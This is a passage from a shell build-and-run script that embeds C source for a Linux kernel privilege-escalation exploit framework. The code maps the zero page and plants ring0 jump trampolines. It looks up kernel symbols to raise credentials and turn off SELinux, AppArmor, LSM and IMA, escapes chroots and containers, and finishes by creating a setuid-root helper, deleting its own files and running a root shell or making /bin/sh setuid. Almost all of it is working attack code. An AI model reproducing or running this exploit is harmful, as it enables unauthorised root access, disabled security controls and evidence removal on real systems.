  1677.             "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
  1678.             NULL };
  1679.     memset(buf, 0, sizeof(buf));
  1680.  
  1681.     ret = stat("/bin/bash", &st);
  1682.  
  1683.     readlink("/bin/sh", buf, PATH_MAX);
  1684.  
  1685.     setgroups(0, NULL); // uses CAP_SETGID, we don't care if it succeeds
  1686.                 // though it should always
  1687.  
  1688.     // change back to saved working directory
  1689.     if (cwd_dirfd >= 0)
  1690.         fchdir(cwd_dirfd);
  1691.  
  1692.     /* the original dash-vs-bash shell selection (which used the stat/readlink results and
               the argv/envp arrays above) appears to have been replaced here: print our ids, then
               build and run a setuid-root "suid" helper that cleans up the exploit files and runs
               "ls -la;id" as proof of root */
  1693.     printf(" [+] UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
  1694.     printf(" [+] Run ./suid \"ls -la;id\":\n");
  1695.     execl("/bin/sh", "sh", "-c", "echo '#include <stdio.h>\nint main(int argc, char *argv[])\n{setuid(0);setgid(0);system(argv[1]);return 0;}' > suid.c; gcc suid.c -o suid;chown 0:0 suid; chmod +s suid; rm suid.c;./suid \"rm exp_abacus.so exploit exp_abacus.c exploit.c\";./suid \"ls -la;id\"", NULL);
  1696.  
  1697.     fprintf(stdout, " [+] Failed to exec rootshell\n");
  1698. }
  1699.  
  1700. static inline void __cpuid(unsigned int *eax, unsigned int *ebx, unsigned int *ecx,
  1701.                 unsigned int *edx)
  1702. {
  1703.     asm volatile("cpuid"
  1704.         : "=a" (*eax),
  1705.           "=b" (*ebx),
  1706.           "=c" (*ecx),
  1707.           "=d" (*edx)
  1708.         : "0" (*eax), "2" (*ecx));
  1709. }
  1710.  
  1711. static inline void cpuid_count(unsigned int op, int count, unsigned int *eax, unsigned int *ebx,
  1712.                 unsigned int *ecx, unsigned int *edx)
  1713. {
  1714.     *eax = op;
  1715.     *ecx = count;
  1716.     __cpuid(eax, ebx, ecx, edx);
  1717. }
  1718.  
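/* CPUID leaf 7, subleaf 0: EBX bit 7 advertises SMEP.  With SMEP the CPU faults when ring0
   jumps into user pages, which is how this exploit runs its payload, so give the user a
   chance to back out. */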
  1719. static bool smep_chicken_out(void)
  1720. {
  1721.     unsigned int eax, ebx, ecx, edx;
  1722.     cpuid_count(7, 0, &eax, &ebx, &ecx, &edx);
  1723.  
  1724.     if (ebx & (1 << 7)) {
  1725.         char c;
  1726.         printf(" [-] SMEP detected, this exploit will very likely fail on recent kernels.  Continue? (y/N)\n");
  1727.         c = getchar();
  1728.         if (c == 'y' || c == 'Y')
  1729.             return false;
  1730.         return true;
  1731.     }
  1732.  
  1733.     return false;
  1734. }
  1735.  
  1736. int pa__init(void *m)
  1737. {
  1738.     char cwd[4096];
  1739.     char c;
  1740.  
  1741.     // save off the current working directory so we can change back to
  1742.     // it after breaking out of any chroots
  1743.     getcwd(cwd, sizeof(cwd));
  1744.     cwd_dirfd = open(cwd, O_RDONLY | O_DIRECTORY);
  1745.  
  1746.     /* page some things in */
  1747.     mlock(&own_the_kernel, 0x1000);
  1748.     c = *(volatile char *)&own_the_kernel;
  1749.     mlock(&exp_state, 0x1000);
  1750.     mlock(&bella_mafia_quackafella_records_incorporated_by_rhyme_syndicate_three_yellow_men_trillionaire_club, 0x1000);
  1751.     c = *(volatile char *)&bella_mafia_quackafella_records_incorporated_by_rhyme_syndicate_three_yellow_men_trillionaire_club;
  1752.     mlock(&give_it_to_me_any_way_you_can, 0x1000);
  1753.     c = *(volatile char *)&give_it_to_me_any_way_you_can;
  1754.     mlock(&exit_kernel, 0x1000);
  1755.     c = *(volatile char *)&exit_kernel;
  1756.     mlock(&make_range_readwrite, 0x1000);
  1757.     c = *(volatile char *)&make_range_readwrite;
  1758.     mlock(&make_range_readonly, 0x1000);
  1759.     c = *(volatile char *)&make_range_readonly;
  1760.     mlock(&get_kallsyms_lookup_name, 0x1000);
  1761.     c = *(volatile char *)&get_kallsyms_lookup_name;
  1762.  
  1763.     sync();
  1764.  
  1765.     get_segment_descriptors();
  1766.  
  1767.     exit_stack = (char *)calloc(1, 1024 * 1024);
  1768.     if (exit_stack == NULL) {
  1769.         fprintf(stdout, "Unable to alloc exit_stack\n");
  1770.         exit(1);
  1771.     }
  1772.     exp_state.exit_stack = exit_stack;
  1773.  
  1774. #ifndef NON_NULL_ONLY
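    /* mmap() with MAP_FIXED at address 0 returns NULL on success, so a non-NULL return
       (including MAP_FAILED) means the zero page could not be mapped; the PER_SVR4
       personality maps page zero at exec time (MMAP_PAGE_ZERO), so mprotect() is enough
       there.  Note that run.sh passes -DNON_NULL_ONLY, so this block is normally compiled out. */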
  1775.     if ((personality(0xffffffff)) != PER_SVR4) {
  1776.         mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  1777.         if (mem != NULL) {
  1778.             mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  1779.             if (mem != NULL) {
  1780.                 fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
  1781.                 goto boo_hiss;
  1782.             }
  1783.         }
  1784.     } else {
  1785.         main_ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
  1786.         if (main_ret == -1) {
  1787.             fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
  1788.             goto boo_hiss;
  1789.         }
  1790.     }
  1791.     goto great_success;
  1792. boo_hiss:
  1793. #ifdef HAVE_SELINUX
  1794.     if (exp_state.run_from_main == 1 && is_selinux_enabled()) {
  1795.         security_context_t scontext;
  1796.         context_t newcontext;
  1797.         int retval;
  1798.  
  1799.         retval = getcon(&scontext);
  1800.         if (retval < 0)
  1801.             goto oh_fail;
  1802.  
  1803.         if (strstr(scontext, ":wine_t:")) {
  1804.             fprintf(stdout, "allow_unconfined_mmap_low must actually work on this machine!\n");
  1805.             /* don't repeat */
  1806.             exit(1);
  1807.         }
  1808.  
  1809.         fprintf(stdout, "But wait!  Perhaps SELinux can revive this dead exploit...\n");
  1810.         newcontext = context_new(scontext);
  1811.         freecon(scontext);
  1812.         retval = context_type_set(newcontext, "wine_t");
  1813.         if (retval)
  1814.             goto oh_fail;
  1815.         scontext = context_str(newcontext);
  1816.         if (scontext == NULL)
  1817.             goto oh_fail;
  1818.         if (security_check_context(scontext) < 0)
  1819.             goto oh_fail;
  1820.         retval = setexeccon(scontext);
  1821.         if (retval < 0)
  1822.             goto oh_fail;
  1823.         context_free(newcontext);
  1824.         fprintf(stdout, "This looks promising!\n");
  1825.         execl("/proc/self/exe", "/proc/self/exe", (char *)NULL);
  1826.     }
  1827. oh_fail:
  1828.     fprintf(stdout, "Nope ;(\n");
  1829. #endif
  1830.     exit(1);
  1831. great_success:
  1832.     fprintf(stdout, " [+] MAPPED ZERO PAGE!\n");
  1833. #endif
  1834.  
  1835.     add_exploit_modules();
  1836.  
  1837.     if (num_exploits == 0) {
  1838.         fprintf(stdout, "No exploit modules detected, exiting.\n");
  1839.         exit(1);
  1840.     }
  1841.  
  1842.     main_ret = 0;   /* always use the first exploit module */
  1843.  
  1844.     prepare = modules[main_ret].prep;
  1845.     trigger = modules[main_ret].trigger;
  1846.     ring0_cleanup = modules[main_ret].ring0_cleanup;
  1847.     if (ring0_cleanup) {
  1848.         char c;
  1849.         mlock(ring0_cleanup, 0x1000);
  1850.         c = *(volatile char *)ring0_cleanup;
  1851.     }
  1852.     get_exploit_state_ptr = modules[main_ret].get_exploit_state_ptr;
  1853.     post = modules[main_ret].post;
  1854.     requires_null_page = modules[main_ret].requires_null_page;
  1855.     requires_symbols_to_trigger = modules[main_ret].requires_symbols_to_trigger;
  1856.  
  1857.     exp_state.get_kernel_sym = (_get_kernel_sym)&get_kernel_sym;
  1858.     exp_state.own_the_kernel = (void *)&own_the_kernel;
  1859.     exp_state.exit_kernel = (void *)&exit_kernel;
  1860.     get_exploit_state_ptr(&exp_state);
  1861.  
  1862.     our_uid = getuid();
  1863.  
  1864.     set_fs_root = (_set_fs_root)get_kernel_sym("set_fs_root");
  1865.     set_fs_pwd = (_set_fs_pwd)get_kernel_sym("set_fs_pwd");
  1866.     virt_addr_valid = (_virt_addr_valid)get_kernel_sym("__virt_addr_valid");
  1867.     vc_sock_stat = (unsigned long)get_kernel_sym("vc_sock_stat");
  1868.     prepare_ve0_process = (_prepare_ve0_process)get_kernel_sym("prepare_ve0_process");
  1869.     init_task = (unsigned long *)get_kernel_sym("init_task");
  1870.     init_fs = (unsigned long)get_kernel_sym("init_fs");
  1871.     default_exec_domain = (unsigned long)get_kernel_sym("default_exec_domain");
  1872.     bad_file_ops = (unsigned long *)get_kernel_sym("bad_file_ops");
  1873.     bad_file_aio_read = (unsigned long)get_kernel_sym("bad_file_aio_read");
  1874.     ima_audit = (int *)get_kernel_sym("ima_audit");
  1875.     ima_file_mmap = (unsigned char *)get_kernel_sym("ima_file_mmap");
  1876.     ima_bprm_check = (unsigned char *)get_kernel_sym("ima_bprm_check");
  1877.     ima_path_check = (unsigned char *)get_kernel_sym("ima_path_check");
  1878.     ima_file_check = (unsigned char *)get_kernel_sym("ima_file_check");
  1879.     selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing");
  1880.     selinux_enabled = (int *)get_kernel_sym("selinux_enabled");
  1881.     apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled");
  1882.     apparmor_complain = (int *)get_kernel_sym("apparmor_complain");
  1883.     apparmor_audit = (int *)get_kernel_sym("apparmor_audit");
  1884.     apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall");
  1885.     security_ops = (unsigned long *)get_kernel_sym("security_ops");
  1886.     default_security_ops = get_kernel_sym("default_security_ops");
  1887.     sel_read_enforce = get_kernel_sym("sel_read_enforce");
  1888.     audit_enabled = (int *)get_kernel_sym("audit_enabled");
  1889.     commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
  1890.     prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
  1891.     xen_start_info = (unsigned long *)get_kernel_sym("xen_start_info");
  1892.     ptmx_fops = (unsigned long *)get_kernel_sym("ptmx_fops");
  1893.     mark_rodata_ro = get_kernel_sym("mark_rodata_ro");
  1894.     set_kernel_text_ro = get_kernel_sym("set_kernel_text_ro");
  1895.     make_lowmem_page_readonly = (_make_lowmem_page_readonly)get_kernel_sym("make_lowmem_page_readonly");
  1896.     make_lowmem_page_readwrite = (_make_lowmem_page_readwrite)get_kernel_sym("make_lowmem_page_readwrite");
  1897.  
  1898.     if (smep_chicken_out())
  1899.         exit(1);
  1900.  
  1901.     main_ret = prepare(mem);
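    /* plant a small trampoline in the zero page, depending on what the module's prepare()
       asked for: "ff 25" is an indirect jmp through a pointer stored just after it
       (RIP-relative on x86_64, an absolute page-zero address on i386), and the
       EXIT_KERNEL_TO_NULL variant is an indirect call into own_the_kernel followed by an
       indirect jmp to exit_kernel so the kernel is exited cleanly on return */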
  1902.     if (main_ret == STRAIGHT_UP_EXECUTION_AT_NULL) {
  1903.         mem[0] = '\xff';
  1904.         mem[1] = '\x25';
  1905.         *(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 0 : 6;
  1906.         *(unsigned long *)&mem[6] = (unsigned long)&own_the_kernel;
  1907.     } else if (main_ret == EXIT_KERNEL_TO_NULL) {
  1908.         mem[0] = '\xff';
  1909.         mem[1] = '\x15';
  1910.         *(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 6 : 12;
  1911.         mem[6] = '\xff';
  1912.         mem[7] = '\x25';
  1913.         *(unsigned int *)&mem[8] = (sizeof(unsigned long) != sizeof(unsigned int)) ? sizeof(unsigned long) : 16;
  1914.         *(unsigned long *)&mem[12] = (unsigned long)&own_the_kernel;
  1915.         *(unsigned long *)&mem[12 + sizeof(unsigned long)] = (unsigned long)&exit_kernel;
  1916.     } else if ((main_ret & EXECUTE_AT_NONZERO_OFFSET) == EXECUTE_AT_NONZERO_OFFSET) {
  1917.         int off = main_ret & 0xfff;
  1918.         mem[off] = '\xff';
  1919.         mem[off + 1] = '\x25';
  1920.         *(unsigned int *)&mem[off + 2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 0 : off + 6;
  1921.         *(unsigned long *)&mem[off + 6] = (unsigned long)&own_the_kernel;
  1922.     }
  1923.  
  1924.     /* trigger it, and handle the exit_kernel case */
  1925.     trigger_get_return();
  1926.  
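    /* own_the_kernel may have bailed out earlier (interrupt context) after planting itself in
       the aio_read slot of ptmx_fops; a readv() on /dev/ptmx re-triggers it from process context */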
  1927.     if (return_to_process_context == 1) {
  1928.         int fd = open("/dev/ptmx", O_RDWR);
  1929.         struct iovec iov;
  1930.  
  1931.         if (fd < 0) {
  1932.             fprintf(stdout, " [-] Unable to open /dev/ptmx to change to process context.\n");
  1933.             exit(1);
  1934.         }
  1935.         iov.iov_base = &iov;
  1936.         iov.iov_len = sizeof(iov);
  1937.         readv(fd, &iov, 1);
  1938.     }
  1939.  
  1940.     if (exp_state.got_ring0) {
  1941.         fprintf(stdout, " [+] Got ring0!\n");
  1942.     } else {
  1943.         fprintf(stdout, "didn't get ring0, bailing\n");
  1944.         exit(0);
  1945.     }
  1946.  
  1947.     if (return_to_process_context == 2)
  1948.         printf(" [+] Adjusted from interrupt handler to process context\n");
  1949.     else if (return_to_process_context == 1)
  1950.         printf(" [-] Failed ring0 execution after attempting process context re-entry\n");
  1951.     if (exp_state.kallsyms_lookup_name)
  1952.         printf(" [+] Obtained internal symbol table for extended functionality\n");
  1953.     printf(" [+] Detected %s %dk stacks, with current at %p%s\n",
  1954.         twofourstyle ? "2.4 style" : "2.6/3.x style",
  1955.         eightk_stack ? 8 : 4, (char *)current_addr,
  1956.         (cred_support || (commit_creds && prepare_kernel_cred)) ? " and cred support" : "");
  1957.     if (raised_caps)
  1958.         fprintf(stdout, " [+] Raised to full old-style capabilities\n");
  1959.     if (cred_offset)
  1960.         fprintf(stdout, " [+] cred ptrs offset found at 0x%04x in task struct\n", cred_offset);
  1961.     if (init_cred_addr)
  1962.         fprintf(stdout, " [+] init_cred found at %p\n", (char *)init_cred_addr);
  1963.  
  1964.     {
  1965.         char msg[64] = {};
  1966.  
  1967.         if (what_we_do & DISABLED_APPARMOR)
  1968.             strcat(msg, " AppArmor");
  1969.         if (what_we_do & DISABLED_SELINUX)
  1970.             strcat(msg, " SELinux");
  1971.         if (what_we_do & DISABLED_LSM)
  1972.             strcat(msg, " LSM");
  1973.         if (what_we_do & DISABLED_IMA)
  1974.             strcat(msg, " IMA");
  1975.         if (!what_we_do)
  1976.             strcpy(msg, " nothing, what an insecure machine!");
  1977.         fprintf(stdout, " [+] Disabled security of :%s\n", msg);
  1978.     }
  1979.     if (fs_offset) {
  1980.         printf(" [+] Found ->fs offset at 0x%x\n", fs_offset);
  1981.         if (init_task && init_fs)
  1982.             printf(" [+] Broke out of any chroots or mnt namespaces\n");
  1983.     }
  1984.     if (vserver_offset) {
  1985.         printf(" [+] Found vserver id info at offset 0x%x\n", vserver_offset);
  1986.     }
  1987.     if (has_vserver) {
  1988.         printf(" [+] Broke out of any vserver container\n");
  1989.     }
  1990.     if (prepare_ve0_process) {
  1991.         printf(" [+] Broke out of any OpenVZ container\n");
  1992.     }
  1993.  
  1994.     if (xen_detected && mark_rodata_ro && set_kernel_text_ro && (make_lowmem_page_readonly == NULL || make_lowmem_page_readwrite == NULL))
  1995.         fprintf(stdout, " [+] Unable to issue Xen hypercall for .text modification -- modification disabled\n");
  1996.  
  1997.     if (exp_state.got_root == 1)
  1998.         fprintf(stdout, " [+] Got root!\n");
  1999.     else {
  2000.         fprintf(stdout, " [+] Failed to get root :(\n");
  2001.         exit(0);
  2002.     }
  2003.  
  2004.     main_ret = post();
  2005.     if (main_ret == RUN_ROOTSHELL)
  2006.         exec_rootshell();
  2007.     else if (main_ret == CHMOD_SHELL) {
  2008.         chmod("/bin/sh", 04755);
  2009.         fprintf(stdout, "/bin/sh is now setuid root.\n");
  2010.     } else if (main_ret == FUNNY_PIC_AND_ROOTSHELL) {
  2011.         system("gthumb --fullscreen ./funny.jpg");
  2012.         exec_rootshell();
  2013.     }
  2014.  
  2015.     return 0;
  2016. }
  2017.  
  2018. void pa__done(void *m)
  2019. {
  2020.     return;
  2021. }
  2022.  
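/* Fallback symbol resolution: the helpers below scan the mapped kernel image for the kallsyms
   format string ("%s+%#lx/%#lx [%s]" or its newer variants), find the code that references it,
   walk back to the call to kallsyms_lookup(), locate kallsyms_expand_symbol() inside it, and
   finally pick out the caller of kallsyms_expand_symbol() whose code shape matches
   kallsyms_lookup_name(), presumably so the ring0 payload can resolve additional kernel
   symbols at runtime. */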
  2023. static inline unsigned long find_starting_string(void)
  2024. {
  2025.     unsigned long i, x;
  2026.     unsigned char *mem;
  2027.  
  2028.     for (x = 0; valid_ranges[x][0]; x++) {
  2029.         mem = (unsigned char *)valid_ranges[x][0];
  2030.         for (i = 0; i < (valid_ranges[x][1] - valid_ranges[x][0]) - 100; i++) {
  2031.             if (!memcmp(&mem[i], "\0%s+%#lx/%#lx [%s]", 19) || // 2.6.18 and earlier
  2032.                 !memcmp(&mem[i], "\0+%#lx/%#lx [%s]", 17) || // before 3.8
  2033.                 !memcmp(&mem[i], "\0+%#lx/%#lx", 12)) // 3.8 and later
  2034.                 return (unsigned long)mem + i + 1;
  2035.         }
  2036.     }
  2037.  
  2038.     return 0UL;
  2039. }
  2040.  
  2041. static inline unsigned long find_reference_to_starting_string(unsigned long addr)
  2042. {
  2043.     unsigned int intaddr = (unsigned int)(addr & 0xFFFFFFFF);
  2044.     unsigned long i, x;
  2045.     unsigned char *mem;
  2046.  
  2047.     for (x = 0; valid_ranges[x][0]; x++) {
  2048.         mem = (unsigned char *)valid_ranges[x][0];
  2049.         for (i = 0; i < (valid_ranges[x][1] - valid_ranges[x][0]) - 100; i++) {
  2050. #ifdef __x86_64__
  2051.             if (mem[i] == 0x48 && *(unsigned int *)&mem[i+3] == intaddr)
  2052. #else
  2053.             if ((mem[i] == 0x68 && *(unsigned int *)&mem[i+1] == intaddr) ||
  2054.                 (mem[i] == 0xc7 && mem[i+1] == 0x44 && mem[i+2] == 0x24 && mem[i+3] == 0x04 && *(unsigned int *)&mem[i+4] == intaddr))
  2055. #endif
  2056.                 return (unsigned long)mem + i;
  2057.         }
  2058.     }
  2059.  
  2060.     return 0UL;
  2061. }
  2062.  
  2063. static inline unsigned long find_call_to_kallsyms_lookup(unsigned char *mem, unsigned long len, unsigned long addr)
  2064. {
  2065.     unsigned long idx = addr - (unsigned long)mem;
  2066.     unsigned long i;
  2067.  
  2068.     for (i = idx; i > idx - 0x100; i--) {
  2069.         if (mem[i] == 0xe8 && *(int *)&mem[i+1] > -0x1000 && *(int *)&mem[i+1] < 0)
  2070.             return (unsigned long)mem + i;
  2071.     }
  2072.  
  2073.     return 0UL;
  2074. }
  2075.  
  2076. static inline unsigned long get_call_target(unsigned long addr)
  2077. {
  2078.     return addr + 5 + *(int *)(addr + 1);
  2079.  
  2080. }
  2081.  
  2082. static inline unsigned long find_kallsyms_expand_symbol(unsigned char *mem, unsigned long len, unsigned long addr)
  2083. {
  2084.     unsigned long i;
  2085.     unsigned long startidx = addr - (unsigned long)mem;
  2086.     int count = 0;
  2087.  
  2088.     for (i = startidx + 0x20; i < startidx + 0x100; i++) {
  2089.         // find near call followed by a test r12/r13
  2090. #ifdef __x86_64__
  2091.         if (mem[i] == 0xe8 && mem[i+3] > 0xF0 && mem[i+4] == 0xFF && mem[i+5] == 0x4d)
  2092. #else
  2093.         if ((mem[i] == 0xe8 && mem[i+3] > 0xF0 && mem[i+4] == 0xFF && mem[i+5] == 0x85) ||
  2094.             // interleaved mov
  2095.             (mem[i] == 0xe8 && mem[i+3] > 0xF0 && mem[i+4] == 0xFF && mem[i+5] == 0x8b && mem[i+8] == 0x85))
  2096. #endif
  2097.             return get_call_target((unsigned long)mem + i);
  2098.     }
  2099.  
  2100.     return 0UL;
  2101. }
  2102.  
  2103. static inline bool call_to_function_pointer_nearby(unsigned char *mem, unsigned long len, unsigned long addr)
  2104. {
  2105.     unsigned long startidx = addr - (unsigned long)mem;
  2106.     unsigned long i;
  2107.  
  2108.     for (i = startidx; i < startidx + 0x30; i++) {
  2109.         // look for call reg / test eax, eax
  2110. #ifdef __x86_64__
  2111.         if (mem[i] == 0x41 && mem[i+1] == 0xff && mem[i+3] == 0x85 && mem[i+4] == 0xc0)
  2112. #else
  2113.         if ((mem[i] == 0xff && mem[i+2] == 0x85 && mem[i+3] == 0xc0) ||
  2114.             (mem[i] == 0xff && mem[i+3] == 0xff && mem[i+4] == 0xff && mem[i+5] == 0xff && mem[i+6] == 0x85 && mem[i+7] == 0xc0))
  2115. #endif
  2116.             return true;
  2117.     }
  2118.  
  2119.     return false;
  2120. }
  2121.  
  2122. static inline bool has_return_value_checking_call_nearby(unsigned char *mem, unsigned long len, unsigned long addr)
  2123. {
  2124.     unsigned long startidx = addr - (unsigned long)mem;
  2125.     unsigned long i;
  2126.  
  2127.     for (i = startidx; i < startidx + 0x30; i++) {
  2128.         // look for relative call / test eax, eax
  2129.         if (mem[i] == 0xe8 && (mem[i+4] == 0x00 || mem[i+4] == 0xff) && mem[i+5] == 0x85 && mem[i+6] == 0xc0) {
  2130.             // now look for the jnz / mov / jmp sequence
  2131. #ifdef __x86_64__
  2132.             if (mem[i+7] == 0x75 && mem[i+9] == 0x48 && mem[i+17] == 0xeb)
  2133. #else
  2134.             if (mem[i+7] == 0x75 && mem[i+9] == 0x8b && mem[i+16] == 0xeb)
  2135. #endif
  2136.                 return true;
  2137.         }
  2138.     }
  2139.  
  2140.     return false;
  2141. }
  2142.  
  2143. static inline unsigned long get_function_address(unsigned char *mem, unsigned long len, unsigned long addr)
  2144. {
  2145.     unsigned long startidx = addr - (unsigned long)mem;
  2146.     unsigned long i;
  2147.  
  2148.     for (i = startidx; i > startidx - 0x100; i--) {
  2149. #ifdef __x86_64__
  2150.         if (!memcmp(&mem[i], "\x55\x48\x89\xe5", 4))
  2151. #else
  2152.         if (!memcmp(&mem[i], "\x55\x89\xe5", 3) || !memcmp(&mem[i], "\x55\x89\xc5", 3))
  2153. #endif
  2154.             return (unsigned long)mem + i;
  2155.     }
  2156.  
  2157.     return 0UL;
  2158. }
  2159.  
  2160. static inline unsigned long find_kallsyms_lookup_name(unsigned char *mem, unsigned long len, unsigned long addr)
  2161. {
  2162.     unsigned long startidx = addr - (unsigned long)mem - 0x2000;
  2163.     unsigned long endidx = addr - (unsigned long)mem + 0x2000;
  2164.     unsigned long i;
  2165.  
  2166.     for (i = startidx; i < endidx; i++) {
  2167.         if (mem[i] == 0xe8 && get_call_target((unsigned long)mem + i) == addr) {
  2168.             // found a call to kallsyms_expand_symbol
  2169.             if (call_to_function_pointer_nearby(mem, len, (unsigned long)mem + i + 5))
  2170.                 continue;
  2171.             if (!has_return_value_checking_call_nearby(mem, len, (unsigned long)mem + i + 5))
  2172.                 continue;
  2173.             return get_function_address(mem, len, (unsigned long)mem + i);
  2174.         }
  2175.     }
  2176.  
  2177.     return 0UL;
  2178. }
  2179.  
  2180. static unsigned long get_kallsyms_lookup_name(void)
  2181. {
  2182.     unsigned char *base = NULL;
  2183.     unsigned long len = 0;
  2184.     unsigned long start_string;
  2185.     unsigned long start_string_ref;
  2186.     unsigned long kallsyms_lookup_call;
  2187.     unsigned long kallsyms_lookup;
  2188.     unsigned long kallsyms_expand_symbol;
  2189.     unsigned long kallsyms_lookup_name_func;
  2190.     int i;
  2191.  
  2192. #ifdef __x86_64__
  2193.     find_kernel_ranges();
  2194. #else
  2195.     /* hack for now */
  2196.     valid_ranges[0][0] = KERNEL_BASE + 0x01000000;
  2197.     valid_ranges[0][1] = valid_ranges[0][0] + (1024 * 1024 * 16);
  2198. #endif
  2199.  
  2200.     if (!valid_ranges[0][0] || !valid_ranges[0][1])
  2201.         return 0UL;
  2202.     start_string = find_starting_string();
  2203.     if (!start_string)
  2204.         return 0UL;
  2205.     start_string_ref = find_reference_to_starting_string(start_string);
  2206.     if (!start_string_ref)
  2207.         return 0UL;
  2208.     for (i = 0; i < NUM_RANGES; i++) {
  2209.         if (start_string_ref >= valid_ranges[i][0] && start_string_ref < valid_ranges[i][1]) {
  2210.             base = (unsigned char *)valid_ranges[i][0];
  2211.             len = valid_ranges[i][1] - valid_ranges[i][0];
  2212.             break;
  2213.         }
  2214.     }
    if (base == NULL)
        return 0UL;
  2215.     kallsyms_lookup_call = find_call_to_kallsyms_lookup(base, len, start_string_ref);
  2216.     if (!kallsyms_lookup_call)
  2217.         return 0UL;
  2218.     kallsyms_lookup = get_call_target(kallsyms_lookup_call);
  2219.     kallsyms_expand_symbol = find_kallsyms_expand_symbol(base, len, kallsyms_lookup);
  2220.     if (!kallsyms_expand_symbol)
  2221.         return 0UL;
  2222.     kallsyms_lookup_name_func = find_kallsyms_lookup_name(base, len, kallsyms_expand_symbol);
  2223.  
  2224.     return kallsyms_lookup_name_func;
  2225. }
  2226.  
  2227. int main(void)
  2228. {
  2229.     exp_state.run_from_main = 1;
  2230.     pa__init(NULL);
  2231.     return 0;
  2232. }
  2233. _EOF
  2234.  
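# build flags: -fomit-frame-pointer is required by the stack-swap hack noted in the C source
# above, and -DNON_NULL_ONLY compiles out the NULL-page mapping path (#ifndef NON_NULL_ONLY)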
  2235. GCC=gcc
  2236. IS_64=`uname -m`
  2237. LINK_FLAG="-ldl"
  2238. OPT_FLAG="-fomit-frame-pointer -O2"
  2239. if [ "$IS_64" = "x86_64" ]; then
  2240.   OPT_FLAG="-m64 -fomit-frame-pointer -O2"
  2241. fi
  2242. OPT_FLAG="$OPT_FLAG -DNON_NULL_ONLY"
  2243.  
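# compile every exp_*.c module into a shared object, retrying without -fno-stack-protector in
# case the local gcc does not support that flag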
  2244. for FILE in exp_*.c; do
  2245.     printf "Compiling $FILE..."
  2246.     $GCC -fno-stack-protector -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null
  2247.     if [ "$?" = "1" ]; then
  2248.         $GCC -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null
  2249.         if [ "$?" = "1" ]; then
  2250.             printf "failed.\n"
  2251.         else
  2252.             printf "OK.\n"
  2253.         fi
  2254.     else
  2255.         printf "OK.\n"
  2256.     fi
  2257. done
  2258.  
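# exploit.c apparently hard-codes /home/spender paths, so rewrite them to the current directory
# before building; the pristine copy is kept as exploit2.c and restored afterwards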
  2259. ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'`
  2260. MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null`
# note: the original script branched on "$1" / mmap_min_addr here, but both branches were
# identical, so the check has been dropped and we simply build and run once; the gcc
# fallbacks are now nested so a successful hardened build is not overwritten
  2262. sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c
  2263. mv exploit.c exploit2.c
  2264. mv exploit1.c exploit.c
  2265. $GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2266. if [ "$?" = "1" ]; then
  2267.     $GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2268.     if [ "$?" = "1" ]; then
  2269.         $GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2270.     fi
  2271. fi
  2272. mv -f exploit2.c exploit.c
  2273. ./exploit